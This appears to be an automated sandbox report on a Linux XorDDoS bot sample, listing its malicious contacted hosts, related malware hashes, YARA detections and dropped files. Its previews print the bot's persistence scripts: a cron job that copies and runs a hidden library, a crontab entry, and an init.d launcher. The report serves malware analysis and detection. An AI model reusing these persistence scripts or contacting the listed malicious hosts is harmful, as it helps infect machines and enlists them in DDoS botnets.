http://www.gnu.org/software/libc/bugs.html	UDMp3dZ7nc.elf, libudev.so.13.dr, bgoiqqymph.13.dr, dthtwwmqvu.13.dr, eqoogeqyds.13.dr, otlzwyqefc.13.dr, vnihfmehfy.13.dr, ksagqhmoao.13.dr, oigyzaiygp.13.dr, sosfbbrzmx.13.dr, qxzsiorokf.13.dr, uhjkqkcgma.13.dr, uzqdvpyngy.13.dr, gphlkawhxw.13.dr, jeyjdycnpv.13.dr, wutujskjnm.13.dr	false		high
http://aa.hostasa.org/config.rar	UDMp3dZ7nc.elf, 6260.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6262.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6263.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6264.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6293.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6296.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6298.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6301.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6303.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6311.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6314.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6316.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6319.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6322.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6328.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6331.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6333.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6335.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6338.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6364.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6367.1.00000000ff80b000.00000000ff82c000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://aa.hostasa.org/config.rartat456.com:1522	UDMp3dZ7nc.elf, 6260.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6262.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6263.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6264.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6293.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6296.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6298.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6301.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6303.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6311.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6314.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6316.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6319.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6322.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6328.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6331.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6333.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6335.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6338.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6364.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6367.1.00000000ff80b000.00000000ff82c000.rw-.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
137.175.90.213	ppp.gggatat456.com	United States	54600	PEGTECHINCUS	true
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43	nova2.elf	Get hash	malicious	Unknown	Browse
	154.216.18.23-boatnet.arm7-2025-01-03T11_41_00.elf	Get hash	malicious	Mirai	Browse
	g.elf	Get hash	malicious	Unknown	Browse
	aarch643308.elf	Get hash	malicious	Unknown	Browse
	ARMV7L.elf	Get hash	malicious	Unknown	Browse
	bash.elf	Get hash	malicious	Unknown	Browse
	ARMV5L.elf	Get hash	malicious	Unknown	Browse
	boatnet.mpsl.elf	Get hash	malicious	Mirai	Browse
	cedhat	Get hash	malicious	Kaiji	Browse
	arc.elf	Get hash	malicious	Unknown	Browse
91.189.91.42	nova2.elf	Get hash	malicious	Unknown	Browse
	154.216.18.23-boatnet.arm7-2025-01-03T11_41_00.elf	Get hash	malicious	Mirai	Browse
	g.elf	Get hash	malicious	Unknown	Browse
	aarch643308.elf	Get hash	malicious	Unknown	Browse
	ARMV7L.elf	Get hash	malicious	Unknown	Browse
	bash.elf	Get hash	malicious	Unknown	Browse
	ARMV5L.elf	Get hash	malicious	Unknown	Browse
	boatnet.mpsl.elf	Get hash	malicious	Mirai	Browse
	cedhat	Get hash	malicious	Kaiji	Browse
	arc.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ppp.gggatat456.com	1.elf	Get hash	malicious	XorDDoS	Browse	142.4.106.74
	iJl2Sb6qRa	Get hash	malicious	XorDDoS	Browse	54.36.145.106
	Di1p3oLnDb.elf	Get hash	malicious	XorDDoS	Browse	79.137.1.133
	xor1.o	Get hash	malicious	XorDDoS	Browse	176.31.91.137
	0Xorddos.o	Get hash	malicious	XorDDoS	Browse	54.36.145.106
	XZFWLZVF1Z	Get hash	malicious	XorDDoS	Browse	54.36.15.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	nova2.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	154.216.18.23-boatnet.arm7-2025-01-03T11_41_00.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	g.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	aarch643308.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	ARMV7L.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	bash.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	ARMV5L.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	boatnet.mpsl.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	cedhat	Get hash	malicious	Kaiji	Browse	91.189.91.42
	arc.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
PEGTECHINCUS	Hilix.mips.elf	Get hash	malicious	Mirai	Browse	45.205.88.197
	http://www.rr8844.com	Get hash	malicious	Unknown	Browse	185.200.64.142
	vcimanagement.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.243.156.243
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	154.195.93.68
	db0fa4b8db0333367e9bda3ab68b8042.spc.elf	Get hash	malicious	Mirai, Gafgyt	Browse	156.247.76.112
	L8RabfF1Hu.exe	Get hash	malicious	Unknown	Browse	154.201.87.51
	L8RabfF1Hu.exe	Get hash	malicious	Unknown	Browse	154.201.87.51
	jklmips.elf	Get hash	malicious	Unknown	Browse	45.205.88.155
	1.elf	Get hash	malicious	Unknown	Browse	199.33.215.69
	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	156.247.76.147
INIT7CH	nova2.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	154.216.18.23-boatnet.arm7-2025-01-03T11_41_00.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	g.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	aarch643308.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	ARMV7L.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	bash.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	ARMV5L.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	boatnet.mpsl.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	cedhat	Get hash	malicious	Kaiji	Browse	109.202.202.202
	arc.elf	Get hash	malicious	Unknown	Browse	109.202.202.202

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/cron.hourly/gcc.sh	HaJTqGiPpD	Get hash	malicious	XorDDoS	Browse
	eTASxT3bjO.elf	Get hash	malicious	XorDDoS	Browse
	TmoTjBkSXT.elf	Get hash	malicious	XorDDoS	Browse
	dptxrnhxmx.elf	Get hash	malicious	XorDDoS	Browse
	1.elf	Get hash	malicious	XorDDoS	Browse
	iJl2Sb6qRa	Get hash	malicious	XorDDoS	Browse
	Di1p3oLnDb.elf	Get hash	malicious	XorDDoS	Browse
	fuck.elf	Get hash	malicious	XorDDoS	Browse
	dkuidbsedp	Get hash	malicious	XorDDoS	Browse
	libudev.so	Get hash	malicious	XorDDoS	Browse

Created / dropped Files

/etc/cron.hourly/gcc.sh

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.807897441464882
Encrypted:	false
SSDEEP:	3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
MD5:	3BAB747CEDC5F0EBE86AAA7F982470CD
SHA1:	3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
SHA-256:	74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
SHA-512:	21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:	Filename: HaJTqGiPpD, Detection: malicious, Browse Filename: eTASxT3bjO.elf, Detection: malicious, Browse Filename: TmoTjBkSXT.elf, Detection: malicious, Browse Filename: dptxrnhxmx.elf, Detection: malicious, Browse Filename: 1.elf, Detection: malicious, Browse Filename: iJl2Sb6qRa, Detection: malicious, Browse Filename: Di1p3oLnDb.elf, Detection: malicious, Browse Filename: fuck.elf, Detection: malicious, Browse Filename: dkuidbsedp, Detection: malicious, Browse Filename: libudev.so, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.

/etc/crontab

Download File

Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.8484226636198593
Encrypted:	false
SSDEEP:	3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
MD5:	636299E19F3BFB8CDA661BC956C1CE7F
SHA1:	2B45273CCBFE139D58FC3554D6943D4338C18E15
SHA-256:	8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
SHA-512:	41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/3 * * * root /etc/cron.hourly/gcc.sh.

/etc/init.d/UDMp3dZ7nc.elf

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.346960316467168
Encrypted:	false
SSDEEP:	6:hUtoFdU9nysKheJs8BE21YJvmNeMwhwM1DzRI8Q8N6MzPQ8p4:6d/s8BEMO1wuzuJ8NzI8y
MD5:	6072B870703E8920C2E08A2221EF24F7
SHA1:	C77C9E9C5EC8AAEC4DC6BFA7AB9C0E671AE4B566
SHA-256:	A92424FCDBF48A81458FA0937FB2BD7280DEA9B1F22E6D13D945D3EBE943A984
SHA-512:	8B0C1C493923D691721A3E0A25C0071BAEEA7D3C82D230B1FB5BC959DB1C4FA2DAB47832C76F4966EB1E6D41B86080E227F535B6D754E2AEC6BDFA06386968C9
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# chkconfig: 12345 90 90.# description: UDMp3dZ7nc.elf.### BEGIN INIT INFO.# Provides:..UDMp3dZ7nc.elf.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.UDMp3dZ7nc.elf.### END INIT INFO.case $1 in.start)../tmp/UDMp3dZ7nc.elf..;;.stop)..;;.*)../tmp/UDMp3dZ7nc.elf..;;.esac.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/run/gcc.pid

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	3.8400182662886326
Encrypted:	false
SSDEEP:	3:7TDPGJ2QIGU:xQID
MD5:	545AAA15453F114F6D027D074D54A3F7
SHA1:	B9B952F9E5A09CBF4BD71AF78E3049FAE042451B
SHA-256:	637A7304BB16FE9C7046498803320F086945368EF8DDF9D30D6AF564979E66B7
SHA-512:	EDC262D4E09F9E4CC255D2E4A1D1E06B12D3F19B80BDFF69C7A042A0E0770BC6F375DBD9220274F33510A9ACA43AE3DA5EEBED60E7D7280DFC8049F186B0C839
Malicious:	false
Reputation:	low
Preview:	pdtdvfdbumvoldufbmfvvwvyzmhpzexq

/usr/bin/bgoiqqymph

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.19759343868918
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojq:/fUywKQ7Fb1pNL/p52fjQn36Euq
MD5:	36DFBCD1CB8FB95125AF217877D82A82
SHA1:	E3838A8AB5E18024A85D075377E1934FEC4A51ED
SHA-256:	CBD186014084AE6161C99C3FA870464A2F8ED5E799F513E905F5ADF0FC38D207
SHA-512:	A73B23E9EDBA630CBBF35A2D13F89F6469F3E080916A71BD12CF2FAD81A2D6BD03575887A77730A37EF14042A8907FBBF41C866A92632FAA366ED5636E896FE1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/bgoiqqymph, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/bgoiqqymph, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/bgoiqqymph, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/bgoiqqymph, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/dthtwwmqvu

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.1975908595683995
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojL:/fUywKQ7Fb1pNL/p52fjQn36EuL
MD5:	F0744C231FD483B8E536ADAAE22FED9C
SHA1:	FE5563A0C88FED80ED4678281E62B3140E030531
SHA-256:	BB376E55F703FC68B2CA6A2DBB508C26E8F9CF7AAFCE4B5DF808AF4E54716A3C
SHA-512:	D5416BB30EAEDF53A0F7BAC8BA77FC83A4B03857B5F6780955A38A4DE54A82DDD087033C6DF529CF2920A27368BE34FA787E928EFEF291BA0B0D7CF82D5940BD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/dthtwwmqvu, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/dthtwwmqvu, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/dthtwwmqvu, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/dthtwwmqvu, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/eqoogeqyds

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197580278571238
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoj2:/fUywKQ7Fb1pNL/p52fjQn36Eu2
MD5:	4BB785727D658C24555AFB2552203824
SHA1:	FFAF01EB7B0FAD14E7DE427D32FC38CC73E68A73
SHA-256:	06E6F11DEFFE5489E98F507605B0EE2721235D1A7EED4DB5C92E8DC0A60908D7
SHA-512:	09D2B6ED940088674F94EB1511623F4963659CB1F8916130D50B2604914CC80AFE052AA15E75AFDBDB95FD2890002D733778DCD98C0BA34C9486588412B3FDC1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/eqoogeqyds, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/eqoogeqyds, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/eqoogeqyds, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/eqoogeqyds, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/gphlkawhxw

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197578026577081
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoja:/fUywKQ7Fb1pNL/p52fjQn36Eua
MD5:	32BAEF41BEF86E657CECB26BA601C8FD
SHA1:	A611883DFC4DADE5097D2F52FDB266ABCB6288AF
SHA-256:	38FF5CC3275A442B6D8CE21CBF370603723E7E9F0C02DCC92EBD584F53B5398B
SHA-512:	A93645C459157DE53EC3696BA32FA0BE2012BDD6ACA54C2175288A48DA91860C91D7146BE448FA89FCF280F6EBE4D1D269A42609A5CB2AAF0F76D987A33EDFA9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/gphlkawhxw, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/gphlkawhxw, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/gphlkawhxw, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/gphlkawhxw, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/jeyjdycnpv

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.19758381336493
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojC:/fUywKQ7Fb1pNL/p52fjQn36EuC
MD5:	874925F3383CF4D89CFB331D6357DCC4
SHA1:	FBBC07B5494EA0A561F980B908FBB817706BA112
SHA-256:	3E418FEFF6FD38021395689440775591D1BCFFADC5EF2B857F4BB677C0394490
SHA-512:	B709F9A1219C604303D6F9422E3A05F4F78B9FE7F44D16C047F2C23730B219F78D229C48AE854991FC612243C26F940411647219EDE5E7D5046AFB7C4AA61B64
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/jeyjdycnpv, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/jeyjdycnpv, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/jeyjdycnpv, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/jeyjdycnpv, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/ksagqhmoao

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197589033594373
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojd:/fUywKQ7Fb1pNL/p52fjQn36Eud
MD5:	C2BE7F6F3D8A2DD22BB027877353C35F
SHA1:	D6EE5D2C4F1F43FC4AC528CA6C7BE18A8F31BA20
SHA-256:	9C7B85C4A23EA601F88FABE4D6B022D50AC2397209641EF276D81EFD93334437
SHA-512:	B6FFFC8E99608B7B239B6100B277C2983F4AD50FCC592E30F102CA38AA1999FB31701B56123541699155505C64DECD2CEE1B078183DC738C0474DEEB1AECB39C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ksagqhmoao, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ksagqhmoao, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ksagqhmoao, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ksagqhmoao, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/oigyzaiygp

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197581226504545
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojW:/fUywKQ7Fb1pNL/p52fjQn36EuW
MD5:	62C3A5BB687FBBF7C6618BEA4DAADF29
SHA1:	A6B5249BF5F26E8A7A1DA8A286B390FDA6A39BC8
